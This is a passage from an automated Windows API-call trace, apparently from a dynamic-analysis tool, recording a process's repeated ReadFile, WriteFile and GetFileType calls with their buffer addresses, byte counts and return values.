lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.283] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.283] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.283] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, 